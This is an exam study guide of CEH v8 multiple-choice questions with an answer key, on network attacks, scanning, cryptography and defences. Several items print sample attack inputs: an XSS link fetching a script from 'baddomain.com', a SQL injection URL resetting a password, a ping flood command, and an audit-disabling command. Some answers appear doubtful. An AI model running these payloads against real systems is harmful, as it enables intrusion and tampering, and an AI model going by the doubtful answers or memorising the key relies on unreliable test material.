Certified Ethical Hacking (CEH) v.8 Study Guide part 2 (101-200)


How does a denial-of-service attack work? A. A hacker prevents a legitimate user (or group of users) from accessing a service B. A hacker uses every character, word, or letter he or she can think of to defeat authentication C. A hacker tries to decipher a password by using a system, which subsequently crashes the network D. A hacker attempts to imitate a legitimate user by confusing a computer or even another person

A. A hacker prevents a legitimate user (or group of users) from accessing a service

A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate? A. A buffer overflow attack has been attempted B. A buffer overflow attack has already occurred C. A firewall has been breached and this is logged D. An intrusion detection system has been triggered E. The system has crashed

A. A buffer overflow attack has been attempted

Bill is a security analyst for his company. All the switches used in the company's office are Cisco switches. Bill wants to make sure all switches are safe from ARP poisoning. How can Bill accomplish this? A. Bill can use the command: ip dhcp snooping. B. Bill can use the command: no ip snoop. C. Bill could use the command: ip arp no flood. D. He could use the command: ip arp no snoop.

A. Bill can use the command: ip dhcp snooping.

Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it cannot mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns? A. Bob can explain that using a weak key management technique is a form of programming error B. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique D. Bob can explain that a random number generator can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error

A. Bob can explain that using a weak key management technique is a form of programming error

WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. Search engines like Google, frequently spider web pages for indexing. How will you stop web spiders from crawling certain directories on your website? A. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled B. Place authentication on root directories that will prevent crawling from these spiders C. Enable SSL on the restricted directories which will block these spiders from crawling D. Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index

A. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled

Frederickson Security Consultants is currently conducting a security audit on the networks of Hawthorn Enterprises, a contractor for the Department of Defense. Since Hawthorn Enterprises conducts business daily with the federal government, they must abide by very stringent security policies. Frederickson is testing all of Hawthorn's physical and logical security measures including biometrics, passwords, and permissions. The federal government requires that all users must utilize random, non-dictionary passwords that must take at least 30 days to crack. Frederickson has confirmed that all Hawthorn employees use a random password generator for their network passwords. The Frederickson consultants have saved off numerous SAM files from Hawthorn's servers using Pwdump6 and are going to try and crack the network passwords. What method of attack is best suited to crack these passwords in the shortest amount of time? A. Brute force attack B. Birthday attack C. Dictionary attack D. Brute service attack

A. Brute force attack

Charlie is the network administrator for his company. Charlie just received a new Cisco router and wants to test its capabilities out and to see if it might be susceptible to a DoS attack resulting in its locking up. The IP address of the Cisco switch is 172.16.0.45. What command can Charlie use to attempt this task? A. Charlie can use the command: ping -l 56550 172.16.0.45 -t. B. Charlie can try using the command: ping 56550 172.16.0.45. C. By using the command ping 172.16.0.45 Charlie would be able to lock up the router D. He could use the command: ping -4 56550 172.16.0.45.

A. Charlie can use the command: ping -l 56550 172.16.0.45 -t.

This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data. <a href="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E">See foobar</a> What is this attack? A. Cross-site-scripting attack B. SQL Injection C. URL Traversal attack D. Buffer Overflow attack

A. Cross-site-scripting attack

The SNMP Read-Only Community String is like a password. The string is sent along with each SNMP Get-Request and allows (or denies) access to a device. Most network vendors ship their equipment with a default password of "public". This is the so-called "default public community string". How would you keep intruders from getting sensitive information regarding the network devices using SNMP? (Select 2 answers) A. Enable SNMPv3 which encrypts username/password authentication B. Use your company name as the public community string replacing the default 'public' C. Enable IP filtering to limit access to SNMP device D. The default configuration provided by device vendors is highly secure and you don't need to change anything

A. Enable SNMPv3 which encrypts username/password authentication C. Enable IP filtering to limit access to SNMP device

One of the most common and the best way of cracking RSA encryption is to begin to derive the two prime numbers, which are used in the RSA PKI mathematical process. If the two numbers p and q are discovered through a _____________ process, then the private key can be derived. A. Factorization B. Prime Detection C. Hashing D. Brute-forcing

A. Factorization

John runs a Web server, IDS and firewall on his network. Recently his Web server has been under constant hacking attacks. He looks up the IDS log files and sees no intrusion attempts but the Web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks but still the IDS alerts no intrusion whatsoever. John becomes suspicious and views the Firewall logs and he notices huge SSL connections constantly hitting his Web server. Hackers have been using the encrypted HTTPS protocol to send exploits to the Web server and that was the reason the IDS did not detect the intrusions. How would John protect his network from these types of attacks? A. Install a proxy server and terminate SSL at the proxy B. Enable the IDS to filter encrypted HTTPS traffic C. Install a hardware SSL "accelerator" and terminate SSL at this layer D. Enable the Firewall to filter encrypted HTTPS traffic

A. Install a proxy server and terminate SSL at the proxy C. Install a hardware SSL "accelerator" and terminate SSL at this layer

You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don't get answered. A basic nmap scan of 192.168.1.10 seems to hang without returning any information. What should you do next? A. Run NULL TCP hping2 against 192.168.1.10 B. Run nmap XMAS scan against 192.168.1.10 C. The firewall is blocking all the scans to 192.168.1.10 D. Use NetScan Tools Pro to conduct the scan

A. Run NULL TCP hping2 against 192.168.1.10

Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches. If these switches' ARP cache is successfully flooded, what will be the result? A. The switches will drop into hub mode if the ARP cache is successfully flooded. B. If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks. C. Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch. D. The switches will route all traffic to the broadcast address creating collisions.

A. The switches will drop into hub mode if the ARP cache is successfully flooded.

Blane is a network security analyst for his company. From an outside IP, Blane performs an XMAS scan using Nmap. Almost every port scanned does not elicit a response. What can he infer from this kind of response? A. These ports are open because they do not elicit a response. B. He can tell that these ports are in stealth mode. C. If a port does not respond to an XMAS scan using NMAP, that port is closed. D. The scan was not performed correctly using NMAP since all ports, no matter what their state, will elicit some sort of response from an XMAS scan.

A. These ports are open because they do not elicit a response.

You went to great lengths to install all the necessary technologies to prevent hacking attacks, such as expensive firewalls, antivirus software, anti-spam systems and intrusion detection/prevention tools in your company's network. You have configured the most secure policies and tightened every device on your network. You are confident that hackers will never be able to gain access to your network with a complex security system in place. Your peer, Peter Smith, who works in the same department, disagrees with you. He says even the best network security technologies cannot prevent hackers gaining access to the network because of the presence of a "weakest link" in the security chain. What is Peter Smith talking about? A. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain B. "zero-day" exploits are the weakest link in the security chain since the IDS will not be able to detect these attacks C. "Polymorphic viruses" are the weakest link in the security chain since the Anti-Virus scanners will not be able to detect these attacks D. Continuous Spam e-mails cannot be blocked by your security system since spammers use different techniques to bypass the filters in your gateway

A. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain

Yancey is a network security administrator for a large electric company. This company provides power for over 100,000 people in Las Vegas. Yancey has worked for his company for over 15 years and has become very successful. One day, Yancey comes in to work and finds out that the company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down the company once he has left. Yancey does not care if his actions land him in jail for 30 or more years, he just wants the company to pay for what they are doing to him. What would Yancey be considered? A. Yancey would be considered a Suicide Hacker B. Since he does not care about going to jail, he would be considered a Black Hat C. Because Yancey works for the company currently; he would be a White Hat D. Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing

A. Yancey would be considered a Suicide Hacker

In which location are SAM hash passwords stored in Windows 7? A. c:\windows\system32\config\SAM B. c:\winnt\system32\machine\SAM C. c:\windows\etc\drivers\SAM D. c:\windows\config\etc\SAM

A. c:\windows\system32\config\SAM

Identify SQL injection attack from the HTTP requests shown below: A. http://www.myserver.c0m/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00 B. http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22 C. http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e D. http://www.victim.com/example accountnumber=67891&creditamount=999999999

A. http://www.myserver.c0m/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00

What is the command used to create a binary log file using tcpdump? A. tcpdump -w ./log B. tcpdump -r log C. tcpdump -vde logtcpdump -vde ? log D. tcpdump -l /var/log/

A. tcpdump -w ./log

Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. A. true B. false

A. true

What port number is used by LDAP protocol? A. 110 B. 389 C. 464 D. 445

B. 389

What type of encryption does WPA2 use? A. DES 64 bit B. AES-CCMP 128 bit C. MD5 48 bit D. SHA 160 bit

B. AES-CCMP 128 bit

When a normal TCP connection starts, a destination host receives a SYN (synchronize/start) packet from a source host and sends back a SYN/ACK (synchronize acknowledge). The destination host must then hear an ACK (acknowledge) of the SYN/ACK before the connection is established. This is referred to as the "TCP three-way handshake." While waiting for the ACK to the SYN ACK, a connection queue of finite size on the destination host keeps track of connections waiting to be completed. This queue typically empties quickly since the ACK is expected to arrive a few milliseconds after the SYN ACK. How would an attacker exploit this design by launching TCP SYN attack? A. Attacker generates TCP SYN packets with random destination addresses towards a victim host B. Attacker floods TCP SYN packets with random source addresses towards a victim host C. Attacker generates TCP ACK packets with random source addresses towards a victim host D. Attacker generates TCP RST packets with random source addresses towards a victim host

B. Attacker floods TCP SYN packets with random source addresses towards a victim host

Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company's systems for, what is prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the company's computer systems until they have signed the policy in acceptance of its terms. What is this document called? A. Information Audit Policy (IAP) B. Information Security Policy (ISP) C. Penetration Testing Policy (PTP) D. Company Compliance Policy (CCP)

B. Information Security Policy (ISP)

Which definition below best describes a covert channel? A. A server program using a port that is not well known B. Making use of a protocol in a way it was not intended to be used C. It is the multiplexing taking place on a communication link D. It is one of the weak channels used by WEP that makes it insecure

B. Making use of a protocol in a way it was not intended to be used

"Testing the network using the same methodologies and tools employed by attackers" Identify the correct terminology that defines the above statement. A. Vulnerability Scanning B. Penetration Testing C. Security Policy Implementation D. Designing Network Security

B. Penetration Testing

Neil is closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web sites during work hours, without any consideration for others. Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction? A. They are using UDP that is always authorized at the firewall B. They are using HTTP tunneling software that allows them to communicate with protocols in a way it was not intended C. They have been able to compromise the firewall, modify the rules, and give themselves proper access D. They are using an older version of Internet Explorer that allows them to bypass the proxy server

B. They are using HTTP tunneling software that allows them to communicate with protocols in a way it was not intended

You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate an otherwise impenetrable system. How would you proceed? A. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network B. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information C. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots" D. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

B. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information

File extensions provide information regarding the underlying server technology. Attackers can use this information to search vulnerabilities and launch attacks. How would you disable file extensions in Apache servers? A. Use disable-eXchange B. Use mod_negotiation C. Use Stop_Files D. Use Lib_exchanges

B. Use mod_negotiation

A digital signature is simply a message that is encrypted with the public key instead of the private key. A. true B. false

B. false

In TCP communications there are 8 flags; FIN, SYN, RST, PSH, ACK, URG, ECE, CWR. These flags have decimal numbers assigned to them: FIN = 1 SYN = 2 RST = 4 PSH = 8 ACK = 16 URG = 32 ECE = 64 CWR =128 Example: To calculate SYN/ACK flag decimal value, add 2 (which is the decimal value of the SYN flag) to 16 (which is the decimal value of the ACK flag), so the result would be 18. Based on the above calculation, what is the decimal value for XMAS scan? A. 23 B. 24 C. 41 D. 64

C. 41

Michael is a junior security analyst working for the National Security Agency (NSA) working primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use to decipher encrypted messages including Government Access to Keys (GAK) and inside informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use custom-built algorithms or obscure algorithms purchased from corrupt governments. For this reason, Michael and other security analysts like him have been forced to find different methods of deciphering terrorist messages. One method that Michael thought of using was to hide malicious code inside seemingly harmless programs. Michael first monitors sites and bulletin boards used by known terrorists, and then he is able to glean email addresses to some of these suspected terrorists. Michael then inserts a stealth keylogger into a mapping program file readme.txt and then sends that as an attachment to the terrorist. This keylogger takes screenshots every 2 minutes and also logs all keyboard activity into a hidden file on the terrorist's computer. Then, the keylogger emails those files to Michael twice a day with a built in SMTP server. What technique has Michael used to disguise this keylogging software? A. Steganography B. Wrapping C. ADS D. Hidden Channels

C. ADS

Bob is going to perform an active session hijack against Brownies Inc. He has found a target that allows session oriented connections (Telnet) and performs the sequence prediction on the target operating system. He manages to find an active session due to the high level of traffic on the network. What is Bob supposed to do next? A. Take over the session B. Reverse sequence prediction C. Guess the sequence numbers D. Take one of the parties offline

C. Guess the sequence numbers

Which type of password cracking technique works like dictionary attack but adds some numbers and symbols to the words from the dictionary and tries to crack the password? A. Dictionary attack B. Brute forcing attack C. Hybrid attack D. Syllable attack E. Rule-based attack

C. Hybrid attack

This TCP flag instructs the sending system to transmit all buffered data immediately. A. SYN B. RST C. PSH D. URG E. FIN

C. PSH

What do you call a pre-computed hash? A. Sun tables B. Apple tables C. Rainbow tables D. Moon tables

C. Rainbow tables

Within the context of Computer Security, which of the following statements describes Social Engineering best? A. Social Engineering is the act of publicly disclosing information B. Social Engineering is the means put in place by human resource to perform time accounting C. Social Engineering is the act of getting needed information from a person rather than breaking into a system D. Social Engineering is a training program within sociology studies

C. Social Engineering is the act of getting needed information from a person rather than breaking into a system

Gerald, the Systems Administrator for Hyped Enterprises, has just discovered that his network has been breached by an outside attacker. After performing routine maintenance on his servers, he discovers numerous remote tools were installed that no one claims to have knowledge of in his department. Gerald logs onto the management console for his IDS and discovers an unknown IP address that scanned his network constantly for a week and was able to access his network through a high-level port that was not closed. Gerald traces the IP address he found in the IDS log to a proxy server in Brazil. Gerald calls the company that owns the proxy server and after searching through their logs, they trace the source to another proxy server in Switzerland. Gerald calls the company in Switzerland that owns the proxy server and after scanning through the logs again, they trace the source back to a proxy server in China. What proxy tool has Gerald's attacker used to cover their tracks? A. ISA proxy B. IAS proxy C. TOR proxy D. Cheops proxy

C. TOR proxy

NTP allows you to set the clocks on your systems very accurately, to within 100 ms and sometimes even 10 ms. Knowing the exact time is extremely important for enterprise security. Various security protocols depend on an accurate source of time information in order to prevent "playback" attacks. These protocols tag their communications with the current time, to prevent attackers from replaying the same communications, e.g., a login/password interaction or even an entire communication, at a later date. One can circumvent this tagging if the clock can be set back to the time the communication was recorded. An attacker attempts to corrupt the clocks on devices on your network. You run Wireshark to detect the NTP traffic to see if there are any irregularities on the network. What port number should you enable in the Wireshark display filter to view NTP packets? A. TCP Port 124 B. UDP Port 125 C. UDP Port 123 D. TCP Port 126

C. UDP Port 123

You work for Acme Corporation as Sales Manager. The company has tight network security restrictions. You are trying to steal data from the company's Sales database (Sales.xls) and transfer them to your home computer. Your company filters and monitors traffic that leaves from the internal network to the Internet. How will you achieve this without raising suspicion? A. Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account B. Package the Sales.xls using Trojan wrappers and telnet them back your home computer C. You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques D. Change the extension of Sales.xls to sales.txt and upload them as attachment to your hotmail account

C. You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques

Attackers send an ACK probe packet with random sequence number, no response means port is filtered (Stateful firewall is present) and RST response means the port is not filtered. What type of Port Scanning is this? A. RST flag scanning B. FIN flag scanning C. SYN flag scanning D. ACK flag scanning

D. ACK flag scanning

NetBIOS over TCP/IP allows files and/or printers to be shared over the network. You are trying to intercept the traffic from a victim machine to a corporate network printer. You are attempting to hijack the printer network connection from your laptop by sniffing the wire. Which port does SMB over TCP/IP use? A. 443 B. 139 C. 179 D. 445

D. 445

What is the IV key size used in WPA2? A. 32 B. 24 C. 16 D. 48 E. 128

D. 48 Explanation: Every WPA key includes a 48-bit IV key, which creates 500 trillion combinations and is a stronger encryption compared to WEP. With so many combinations, the possibility of encryption key reuse is lower and therefore the encryption can endure hacking attacks better than WEP. WPA does not make direct use of the master encryption keys and has a message integrity checking facility.

Study the snort rule given below and interpret the rule. alert tcp any any -> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";) A. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111 B. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet C. An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet D. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

D. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

Fred is the network administrator for his company. Fred is testing an internal switch. From an external IP address, Fred wants to try and trick this switch into thinking it already has established a session with his computer. How can Fred accomplish this? A. Fred can accomplish this by sending an IP packet with the RST/SIN bit and the source address of his computer. B. He can send an IP packet with the SYN bit and the source address of his computer. C. Fred can send an IP packet with the ACK bit set to zero and the source address of the switch. D. Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

D. Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

To see how some of the hosts on your network react, Winston sends out SYN packets to an IP range. A number of IPs respond with a SYN/ACK response. Before the connection is established he sends RST packets to those hosts to stop the session. Winston has done this to see how his intrusion detection system will log the traffic. What type of scan is Winston attempting here? A. Winston is attempting to find live hosts on your company's network by using an XMAS scan. B. He is utilizing a SYN scan to find live hosts that are listening on your network. C. This type of scan he is using is called a NULL scan. D. He is using a half-open scan to find live hosts on your network.

D. He is using a half-open scan to find live hosts on your network.

What is the default Password Hash Algorithm used by NTLMv2? A. MD4 B. DES C. SHA-1 D. MD5

D. MD5

Which of the following encryption is NOT based on block cipher? A. DES B. Blowfish C. AES (Rijndael) D. RC4

D. RC4

Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worried that adversaries might be monitoring the communication link and could inspect captured traffic. She would like to tunnel the information to the remote end but does not have VPN capabilities to do so. Which of the following tools can she use to protect the link? A. MD5 B. PGP C. RSA D. SSH

D. SSH

Joseph has just been hired on to a contractor company of the Department of Defense as their Senior Security Analyst. Joseph has been instructed on the company's strict security policies that have been implemented, and the policies that have yet to be put in place. Per the Department of Defense, all DoD users and the users of their contractors must use two-factor authentication to access their networks. Joseph has been delegated the task of researching and implementing the best two-factor authentication method for his company. Joseph's supervisor has told him that they would like to use some type of hardware device in tandem with a security or identifying pin number. Joseph's company has already researched using smart cards and all the resources needed to implement them, but found the smart cards to not be cost effective. What type of device should Joseph use for two-factor authentication? A. Biometric device B. OTP C. Proximity cards D. Security token

D. Security token

Why do attackers use proxy servers? A. To ensure the exploits used in the attacks always flip reverse vectors B. Faster bandwidth performance and increase in attack speed C. Interrupt the remote victim's network traffic and reroute the packets to attacker's machine D. To hide the source IP address so that an attacker can hack without any legal corollary

D. To hide the source IP address so that an attacker can hack without any legal corollary

You have successfully gained access to a victim's computer using Windows 2003 Server SMB Vulnerability. Which command will you run to disable auditing from the cmd? A. stoplog stoplog ? B. EnterPol /nolog C. EventViewer o service D. auditpol.exe /disable

D. auditpol.exe /disable

In which step does Steganography fit in the CEH System Hacking Cycle (SHC)? A. Step 2: Crack the password B. Step 1: Enumerate users C. Step 3: Escalate privileges D. Step 4: Execute applications E. Step 5: Hide files F. Step 6: Cover your tracks

E. Step 5: Hide files

You are writing a security policy that hardens against and prevents Footprinting attempts by Hackers. Which of the following countermeasures will NOT be effective against this attack? A. Configure routers to restrict the responses to Footprinting requests B. Configure Web Servers to avoid information leakage and disable unwanted protocols C. Lock the ports with suitable Firewall configuration D. Use an IDS that can be configured to refuse suspicious traffic and pick up Footprinting patterns E. Evaluate the information before publishing it on the Website/Intranet F. Monitor every employee computer with Spy cameras, keyloggers and spy on them G. Perform Footprinting techniques and remove any sensitive information found on DMZ sites H. Prevent search engines from caching a Webpage and use anonymous registration services I. Disable directory and use split-DNS

F. Monitor every employee computer with Spy cameras, keyloggers and spy on them

